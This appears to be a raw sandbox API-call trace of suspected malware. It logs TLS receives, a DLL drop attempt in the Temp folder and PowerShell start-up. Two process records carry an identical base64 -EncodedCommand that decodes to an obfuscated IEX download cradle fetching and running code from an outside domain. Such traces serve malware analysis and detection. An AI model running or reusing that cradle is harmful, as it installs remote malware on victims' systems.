	[0920.109] recv (in: s=0x4c8, buf=0x30045e0, len=5, flags=0 | out: buf=0x30045e0*) returned 5
	[0920.109] recv (in: s=0x4c8, buf=0x30045e5, len=16416, flags=0 | out: buf=0x30045e5*) returned 5893
	[0920.110] recv (in: s=0x4c8, buf=0x3005cea, len=10523, flags=0 | out: buf=0x3005cea*) returned 10523
	[0920.275] DecryptMessage (in: phContext=0x1c69db60, pMessage=0x302cdf8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x302cdf8, pfQOP=0x0) returned 0x0
	[0920.276] recv (in: s=0x4c8, buf=0x30045e0, len=5, flags=0 | out: buf=0x30045e0*) returned 5
	[0920.276] recv (in: s=0x4c8, buf=0x30045e5, len=16416, flags=0 | out: buf=0x30045e5*) returned 192
	[0920.276] recv (in: s=0x4c8, buf=0x30046a5, len=16224, flags=0 | out: buf=0x30046a5*) returned 16224
	[0920.726] DecryptMessage (in: phContext=0x1c69db60, pMessage=0x302d038, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x302d038, pfQOP=0x0) returned 0x0
	[0920.727] recv (in: s=0x4c8, buf=0x30045e0, len=5, flags=0 | out: buf=0x30045e0*) returned 5
	[0920.727] recv (in: s=0x4c8, buf=0x30045e5, len=16416, flags=0 | out: buf=0x30045e5*) returned 3603
	[0920.727] recv (in: s=0x4c8, buf=0x30053f8, len=12813, flags=0 | out: buf=0x30053f8*) returned 12813
	[0921.269] DecryptMessage (in: phContext=0x1c69db60, pMessage=0x302d2a0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x302d2a0, pfQOP=0x0) returned 0x0
	[0921.270] recv (in: s=0x4c8, buf=0x30045e0, len=5, flags=0 | out: buf=0x30045e0*) returned 5
	[0921.270] recv (in: s=0x4c8, buf=0x30045e5, len=16416, flags=0 | out: buf=0x30045e5*) returned 16416
	[0921.270] DecryptMessage (in: phContext=0x1c69db60, pMessage=0x302d4e0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x302d4e0, pfQOP=0x0) returned 0x0
	[0921.271] recv (in: s=0x4c8, buf=0x30045e0, len=5, flags=0 | out: buf=0x30045e0*) returned 5
	[0921.271] recv (in: s=0x4c8, buf=0x30045e5, len=16416, flags=0 | out: buf=0x30045e5*) returned 6137
	[0921.271] recv (in: s=0x4c8, buf=0x3005dde, len=10279, flags=0 | out: buf=0x3005dde*) returned 10279
	[0921.732] DecryptMessage (in: phContext=0x1c69db60, pMessage=0x302d720, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x302d720, pfQOP=0x0) returned 0x0
	[0921.733] recv (in: s=0x4c8, buf=0x30045e0, len=5, flags=0 | out: buf=0x30045e0*) returned 5
	[0921.733] recv (in: s=0x4c8, buf=0x30045e5, len=16416, flags=0 | out: buf=0x30045e5*) returned 5796
	[0921.733] recv (in: s=0x4c8, buf=0x3005c89, len=10620, flags=0 | out: buf=0x3005c89*) returned 10620
	[0921.920] DecryptMessage (in: phContext=0x1c69db60, pMessage=0x302d988, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x302d988, pfQOP=0x0) returned 0x0
	[0921.921] recv (in: s=0x4c8, buf=0x30045e0, len=5, flags=0 | out: buf=0x30045e0*) returned 5
	[0921.921] recv (in: s=0x4c8, buf=0x30045e5, len=16416, flags=0 | out: buf=0x30045e5*) returned 2239
	[0921.921] recv (in: s=0x4c8, buf=0x3004ea4, len=14177, flags=0 | out: buf=0x3004ea4*) returned 12864
	[0922.123] recv (in: s=0x4c8, buf=0x30080e4, len=1313, flags=0 | out: buf=0x30080e4*) returned 1072
	[0922.123] recv (in: s=0x4c8, buf=0x3008514, len=241, flags=0 | out: buf=0x3008514*) returned 241
	[0922.154] DecryptMessage (in: phContext=0x1c69db60, pMessage=0x302dbc8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x302dbc8, pfQOP=0x0) returned 0x0
	[0922.159] recv (in: s=0x4c8, buf=0x30045e0, len=5, flags=0 | out: buf=0x30045e0*) returned 5
	[0922.159] recv (in: s=0x4c8, buf=0x30045e5, len=16416, flags=0 | out: buf=0x30045e5*) returned 1898
	[0922.160] recv (in: s=0x4c8, buf=0x3004d4f, len=14518, flags=0 | out: buf=0x3004d4f*) returned 14518
	[0922.504] DecryptMessage (in: phContext=0x1c69db60, pMessage=0x302de30, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x302de30, pfQOP=0x0) returned 0x0
	[0922.505] recv (in: s=0x4c8, buf=0x30045e0, len=5, flags=0 | out: buf=0x30045e0*) returned 5
	[0922.506] recv (in: s=0x4c8, buf=0x30045e5, len=16416, flags=0 | out: buf=0x30045e5*) returned 4237
	[0922.506] recv (in: s=0x4c8, buf=0x3005672, len=12179, flags=0 | out: buf=0x3005672*) returned 12179
	[0922.811] DecryptMessage (in: phContext=0x1c69db60, pMessage=0x302e098, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x302e098, pfQOP=0x0) returned 0x0
	[0922.812] recv (in: s=0x4c8, buf=0x30045e0, len=5, flags=0 | out: buf=0x30045e0*) returned 5
	[0922.812] recv (in: s=0x4c8, buf=0x30045e5, len=16416, flags=0 | out: buf=0x30045e5*) returned 6040
	[0922.812] recv (in: s=0x4c8, buf=0x3005d7d, len=10376, flags=0 | out: buf=0x3005d7d*) returned 10376
	[0922.996] DecryptMessage (in: phContext=0x1c69db60, pMessage=0x302e2d8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x302e2d8, pfQOP=0x0) returned 0x0
	[0922.997] recv (in: s=0x4c8, buf=0x30045e0, len=5, flags=0 | out: buf=0x30045e0*) returned 5
	[0922.997] recv (in: s=0x4c8, buf=0x30045e5, len=16416, flags=0 | out: buf=0x30045e5*) returned 1411
	[0922.997] recv (in: s=0x4c8, buf=0x3004b68, len=15005, flags=0 | out: buf=0x3004b68*) returned 12328
	[0923.198] recv (in: s=0x4c8, buf=0x3007b90, len=2677, flags=0 | out: buf=0x3007b90*) returned 2677
	[0923.199] DecryptMessage (in: phContext=0x1c69db60, pMessage=0x302e518, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x302e518, pfQOP=0x0) returned 0x0
	[0923.199] recv (in: s=0x4c8, buf=0x30045e0, len=5, flags=0 | out: buf=0x30045e0*) returned 5
	[0923.199] recv (in: s=0x4c8, buf=0x30045e5, len=16416, flags=0 | out: buf=0x30045e5*) returned 1606
	[0923.199] recv (in: s=0x4c8, buf=0x3004c2b, len=14810, flags=0 | out: buf=0x3004c2b*) returned 14810
	[0923.362] DecryptMessage (in: phContext=0x1c69db60, pMessage=0x302e758, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x302e758, pfQOP=0x0) returned 0x0
	[0923.363] recv (in: s=0x4c8, buf=0x30045e0, len=5, flags=0 | out: buf=0x30045e0*) returned 5
	[0923.363] recv (in: s=0x4c8, buf=0x30045e5, len=16416, flags=0 | out: buf=0x30045e5*) returned 729
	[0923.363] recv (in: s=0x4c8, buf=0x30048be, len=15687, flags=0 | out: buf=0x30048be*) returned 15687
	[0923.612] DecryptMessage (in: phContext=0x1c69db60, pMessage=0x302e9c0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x302e9c0, pfQOP=0x0) returned 0x0
	[0923.613] recv (in: s=0x4c8, buf=0x30045e0, len=5, flags=0 | out: buf=0x30045e0*) returned 5
	[0923.613] recv (in: s=0x4c8, buf=0x30045e5, len=16416, flags=0 | out: buf=0x30045e5*) returned 4140
	[0923.613] recv (in: s=0x4c8, buf=0x3005611, len=12276, flags=0 | out: buf=0x3005611*) returned 12276
	[0923.944] DecryptMessage (in: phContext=0x1c69db60, pMessage=0x302ec00, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x302ec00, pfQOP=0x0) returned 0x0
	[0923.944] recv (in: s=0x4c8, buf=0x30045e0, len=5, flags=0 | out: buf=0x30045e0*) returned 5
	[0923.944] recv (in: s=0x4c8, buf=0x30045e5, len=16416, flags=0 | out: buf=0x30045e5*) returned 8623
	[0923.944] recv (in: s=0x4c8, buf=0x3006794, len=7793, flags=0 | out: buf=0x3006794*) returned 3472
	[0924.040] recv (in: s=0x4c8, buf=0x3007524, len=4321, flags=0 | out: buf=0x3007524*) returned 1352
	[0924.040] recv (in: s=0x4c8, buf=0x3007a6c, len=2969, flags=0 | out: buf=0x3007a6c*) returned 2969
	[0924.046] DecryptMessage (in: phContext=0x1c69db60, pMessage=0x302ee18, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x302ee18, pfQOP=0x0) returned 0x0
	[0924.047] recv (in: s=0x4c8, buf=0x30045e0, len=5, flags=0 | out: buf=0x30045e0*) returned 5
	[0924.047] recv (in: s=0x4c8, buf=0x30045e5, len=4752, flags=0 | out: buf=0x30045e5*) returned 2386
	[0924.047] recv (in: s=0x4c8, buf=0x3004f37, len=2366, flags=0 | out: buf=0x3004f37*) returned 2366
	[0924.188] DecryptMessage (in: phContext=0x1c69db60, pMessage=0x302f008, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x302f008, pfQOP=0x0) returned 0x0
	[0924.193] SetEvent (hEvent=0x38c) returned 1
	[0934.732] CoTaskMemAlloc (cb=0x104) returned 0x3cd170
	[0934.732] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cd170, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0934.732] CoTaskMemFree (pv=0x3cd170) 
	[0934.733] CoTaskMemAlloc (cb=0x104) returned 0x3cd170
	[0934.733] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x3cd170, nSize=0x80 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x24
	[0934.733] CoTaskMemFree (pv=0x3cd170) 
	[0934.738] CoTaskMemAlloc (cb=0x104) returned 0x3cd170
	[0934.738] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x3cd170, nSize=0x80 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x24
	[0934.738] CoTaskMemFree (pv=0x3cd170) 
	[0939.389] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5P5NRG~1\\", lpszLongPath=0x1c69d830, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 0x1e
	[0939.390] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\vThQexNegi.dll", nBufferLength=0x105, lpBuffer=0x1c69d8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\vThQexNegi.dll", lpFilePart=0x0) returned 0x3f
	[0939.390] SetErrorMode (uMode=0x1) returned 0x1
	[0939.390] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\vThQexNegi.dll" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\vthqexnegi.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffffffffffff
	[0951.408] SetErrorMode (uMode=0x1) returned 0x1
	[0951.414] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c69b1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0951.414] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c69b110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0951.414] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c69b110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0951.414] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c69b110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0951.446] CoTaskMemAlloc (cb=0x104) returned 0x3cd170
	[0951.446] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cd170, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0951.446] CoTaskMemFree (pv=0x3cd170) 

Thread:
	id = 2008
	os_tid = 0x2750


Thread:
	id = 2016
	os_tid = 0x2770


Thread:
	id = 2021
	os_tid = 0x2784

	[0905.175] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0905.179] ResetEvent (hEvent=0x38c) returned 1

Thread:
	id = 2048
	os_tid = 0x27f0


Process:
	id = "127"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x5cbab000"
	os_pid = "0xfa4"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 629
	os_tid = 0xb08

	[0433.544] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 698
	os_tid = 0x15d8


Thread:
	id = 721
	os_tid = 0x163c


Process:
	id = "128"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x5cb09000"
	os_pid = "0x1430"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 641
	os_tid = 0x1434

	[0435.269] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68
	[0784.470] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0788.472] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0788.473] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0788.473] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0788.473] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0799.825] GetVersionExW (in: lpVersionInformation=0x18dd80*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x18dd80*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0799.827] GetVersionExW (in: lpVersionInformation=0x18dd80*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x18dd80*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0799.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0799.845] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0799.846] GetVersionExW (in: lpVersionInformation=0x18daf0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x18daf0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0799.846] SetErrorMode (uMode=0x1) returned 0x1
	[0799.847] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x18dc50 | out: lpFileInformation=0x18dc50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0799.848] SetErrorMode (uMode=0x1) returned 0x1
	[0799.851] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x18dec0 | out: lpdwHandle=0x18dec0) returned 0x94c
	[0800.731] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2bb72d8 | out: lpData=0x2bb72d8) returned 1
	[0800.734] VerQueryValueW (in: pBlock=0x2bb72d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x18de38, puLen=0x18de30 | out: lplpBuffer=0x18de38*=0x2bb7374, puLen=0x18de30) returned 1
	[0800.736] lstrlenW (lpString="䅁") returned 1
	[0800.746] VerQueryValueW (in: pBlock=0x2bb72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x18dda8, puLen=0x18dda0 | out: lplpBuffer=0x18dda8*=0x2bb7450, puLen=0x18dda0) returned 1
	[0800.747] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0800.749] CoTaskMemAlloc (cb=0x2e) returned 0x287340
	[0800.749] lstrcpyW (in: lpString1=0x287340, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0800.753] CoTaskMemFree (pv=0x287340) 
	[0800.753] VerQueryValueW (in: pBlock=0x2bb72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x18dda8, puLen=0x18dda0 | out: lplpBuffer=0x18dda8*=0x2bb74a4, puLen=0x18dda0) returned 1
	[0800.753] lstrlenW (lpString="System.Management.Automation") returned 28
	[0800.753] CoTaskMemAlloc (cb=0x3c) returned 0x24fc30
	[0800.753] lstrcpyW (in: lpString1=0x24fc30, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0800.753] CoTaskMemFree (pv=0x24fc30) 
	[0800.753] VerQueryValueW (in: pBlock=0x2bb72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x18dda8, puLen=0x18dda0 | out: lplpBuffer=0x18dda8*=0x2bb7500, puLen=0x18dda0) returned 1
	[0800.754] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0800.754] CoTaskMemAlloc (cb=0x20) returned 0x2bdb10
	[0800.754] lstrcpyW (in: lpString1=0x2bdb10, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0800.754] CoTaskMemFree (pv=0x2bdb10) 
	[0800.754] VerQueryValueW (in: pBlock=0x2bb72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x18dda8, puLen=0x18dda0 | out: lplpBuffer=0x18dda8*=0x2bb7540, puLen=0x18dda0) returned 1
	[0800.757] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0800.757] CoTaskMemAlloc (cb=0x44) returned 0x24fc30
	[0800.757] lstrcpyW (in: lpString1=0x24fc30, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0800.757] CoTaskMemFree (pv=0x24fc30) 
	[0800.757] VerQueryValueW (in: pBlock=0x2bb72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x18dda8, puLen=0x18dda0 | out: lplpBuffer=0x18dda8*=0x2bb75a8, puLen=0x18dda0) returned 1
	[0800.757] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0800.757] CoTaskMemAlloc (cb=0x76) returned 0x25ef30
	[0800.757] lstrcpyW (in: lpString1=0x25ef30, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0800.757] CoTaskMemFree (pv=0x25ef30) 
	[0800.757] VerQueryValueW (in: pBlock=0x2bb72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x18dda8, puLen=0x18dda0 | out: lplpBuffer=0x18dda8*=0x2bb7644, puLen=0x18dda0) returned 1
	[0800.757] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0800.757] CoTaskMemAlloc (cb=0x44) returned 0x24fc30
	[0800.757] lstrcpyW (in: lpString1=0x24fc30, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0800.757] CoTaskMemFree (pv=0x24fc30) 
	[0800.757] VerQueryValueW (in: pBlock=0x2bb72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x18dda8, puLen=0x18dda0 | out: lplpBuffer=0x18dda8*=0x2bb76a8, puLen=0x18dda0) returned 1
	[0800.757] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0800.757] CoTaskMemAlloc (cb=0x58) returned 0x218fa0
	[0800.757] lstrcpyW (in: lpString1=0x218fa0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0800.758] CoTaskMemFree (pv=0x218fa0) 
	[0800.758] VerQueryValueW (in: pBlock=0x2bb72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x18dda8, puLen=0x18dda0 | out: lplpBuffer=0x18dda8*=0x2bb7724, puLen=0x18dda0) returned 1
	[0800.758] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0800.758] CoTaskMemAlloc (cb=0x20) returned 0x2bdb10
	[0800.758] lstrcpyW (in: lpString1=0x2bdb10, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0800.758] CoTaskMemFree (pv=0x2bdb10) 
	[0800.758] VerQueryValueW (in: pBlock=0x2bb72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x18dda8, puLen=0x18dda0 | out: lplpBuffer=0x18dda8*=0x2bb73cc, puLen=0x18dda0) returned 1
	[0800.758] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0800.758] CoTaskMemAlloc (cb=0x66) returned 0x2b34e0
	[0800.758] lstrcpyW (in: lpString1=0x2b34e0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0800.758] CoTaskMemFree (pv=0x2b34e0) 
	[0800.758] VerQueryValueW (in: pBlock=0x2bb72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x18dda8, puLen=0x18dda0 | out: lplpBuffer=0x18dda8*=0x0, puLen=0x18dda0) returned 0
	[0800.758] VerQueryValueW (in: pBlock=0x2bb72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x18dda8, puLen=0x18dda0 | out: lplpBuffer=0x18dda8*=0x0, puLen=0x18dda0) returned 0
	[0800.758] VerQueryValueW (in: pBlock=0x2bb72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x18dda8, puLen=0x18dda0 | out: lplpBuffer=0x18dda8*=0x0, puLen=0x18dda0) returned 0
	[0800.758] VerQueryValueW (in: pBlock=0x2bb72d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x18dd78, puLen=0x18dd70 | out: lplpBuffer=0x18dd78*=0x2bb7374, puLen=0x18dd70) returned 1
	[0801.685] CoTaskMemAlloc (cb=0x204) returned 0x2676d0
	[0801.685] VerLanguageNameW (in: wLang=0x0, szLang=0x2676d0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0802.569] CoTaskMemFree (pv=0x2676d0) 
